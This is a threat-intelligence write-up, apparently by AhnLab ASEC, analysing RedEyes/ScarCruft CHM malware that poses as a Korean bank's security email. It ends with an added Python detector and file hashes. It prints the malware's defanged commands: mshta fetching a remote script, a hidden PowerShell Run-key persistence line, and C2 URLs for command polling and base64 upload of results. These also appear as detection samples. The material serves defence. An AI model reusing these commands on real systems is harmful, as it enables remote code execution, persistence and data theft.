CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft)

The ASEC (AhnLab Security Emergency response Center) analysis team has discovered that CHM malware, assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being distributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the RedEyes group’s M2RAT malware attack, reported back in February, has the same format as the command used in this attack. That information, together with the details of the CHM malware’s operation process, is described in the following post.

HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)

When the CHM file is executed, it displays a Help screen disguised as a security email from a Korean financial company. The malicious script contained in the CHM runs during this process, so users are unlikely to notice it. There has been a recent increase in malware distribution using CHM files.

Help screen disguised as a security email

The malicious script that is executed is shown below. Like the other CHM malware introduced in the past, it uses a shortcut object (ShortCut): the object is invoked through the Click method, and the command under the Item1 entry is executed. This command runs an additional script hosted at a certain URL through the mshta process.

  • Executed Command
    mshta.exe hxxp://shacc[.]kr/skin/product/1.html
Malicious script within CHM

The “1.html” file executed through the mshta process contains JavaScript code that executes encoded PowerShell commands. The PowerShell command executed here has a format similar to the command used during the aforementioned M2RAT attack process.

1.html file code
Process tree

An examination of the decoded PowerShell command revealed that everything aside from the C2 address, the file name under which the command execution results are saved, and the registry value, has the same code as the command used back in February. This command is responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results.

  • RUN Key Registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: icxrNpVd
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html
  • C2
    hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer name]+[Username] // Receives threat actor’s commands
    hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64-encoded] // Transmits the command execution results
Decoded PowerShell command
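Added detection example (written for this page, not code from the ASEC post or from the malware): it checks Run-key values for the traits of the persistence command above (hidden PowerShell with -ep bypass, a long ping timeout used as a sleep before `||` runs mshta with a remote URL) and labels the two C2 request shapes (?U= command poll, ?R= result upload). The Run values and proxy URLs are constructed samples that reuse only the strings quoted on this page.

```python
import re
from typing import List, Optional
from urllib.parse import urlparse, parse_qs

def refang(s: str) -> str:
    """Turn the post's defanged notation (hxxp, [.]) into parseable form."""
    return s.replace("hxxp", "http").replace("[.]", ".")

def run_value_indicators(value: str) -> List[str]:
    """Return which traits of the persistence command above appear in one Run-key value."""
    v = refang(value)
    hits = []
    if re.search(r"\bpowershell(?:\.exe)?\b", v, re.I) and re.search(r"-(?:ep|executionpolicy)\s+bypass", v, re.I):
        hits.append("powershell_ep_bypass")
    if re.search(r"-windowstyle\s+hidden", v, re.I):
        hits.append("hidden_window")
    # ping -n 1 -w <ms> <unreachable host> || <payload>: the ping times out, so the || branch runs after a delay
    m = re.search(r"\bping(?:\.exe)?\s+-n\s+1\s+-w\s+(\d+)\s+\S+\s*\|\|", v, re.I)
    if m and int(m.group(1)) >= 60000:  # a timeout of a minute or more is a sleep, not a connectivity check
        hits.append("ping_delay_then_or_chain")
    if re.search(r"\bmshta(?:\.exe)?\s+https?://", v, re.I):
        hits.append("mshta_remote_url")
    return hits

def classify_c2_url(url: str) -> Optional[str]:
    """Label the two request shapes described in the post: ?U= command poll, ?R= base64 result upload."""
    p = urlparse(refang(url))
    if not p.path.endswith("/mid.php"):
        return None
    q = parse_qs(p.query)
    return "command_poll" if "U" in q else "result_upload" if "R" in q else None

# Constructed samples (not real telemetry). The first Run value mirrors the command quoted in the post.
RUN_VALUES = {
    "icxrNpVd": r"c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html",
    "OneDrive": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}
PROXY_URLS = [
    "hxxp://shacc[.]kr/skin/product/mid.php?U=DESKTOP-TEST+user",  # constructed: computer name + username
    "hxxp://shacc[.]kr/skin/product/mid.php?R=ZGlyIG91dHB1dA==",   # constructed: base64 of some command output
    "https://example.com/index.html",
]

def audit() -> dict:
    """Run both checks over the constructed samples; Run values showing 3+ traits are flagged."""
    flagged = {n: h for n, h in ((n, run_value_indicators(v)) for n, v in RUN_VALUES.items()) if len(h) >= 3}
    c2 = {u: classify_c2_url(u) for u in PROXY_URLS if classify_c2_url(u)}
    return {"flagged_run_values": flagged, "c2_requests": c2}

if __name__ == "__main__":
    print(audit())
```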

When a system is infected with this type of malware, it can suffer great damage, since the malware is capable of performing various malicious acts such as downloading files and stealing information according to the threat actor’s commands. In particular, malware that targets specific users in Korea may include content on topics of interest to the user to encourage them to execute it, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.

[File Detection]
Trojan/CHM.Agent (2023.03.03.03)

[IOC]
8d2eebd10d90953cfada64575328ae24
806fad8aac92164f971c04bb4877c00f

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
